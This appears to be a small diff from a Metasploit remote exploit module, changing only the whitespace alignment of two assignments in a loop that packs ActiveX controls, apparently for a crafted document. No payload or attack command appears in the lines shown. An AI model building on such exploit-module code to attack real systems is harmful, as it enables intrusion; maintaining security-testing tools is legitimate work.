@@ -833,8 +822,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Packing ActiveX controls...")
     activex.each do |ax|
-      ax_bin  = ax[:bin]
-      ax_xml  = ax[:xml]
+      ax_bin = ax[:bin]
+      ax_xml = ax[:xml]
       ax_rels = ax[:rels]
 
       vprint_status("Packing file: #{ax_bin[:fname]}")
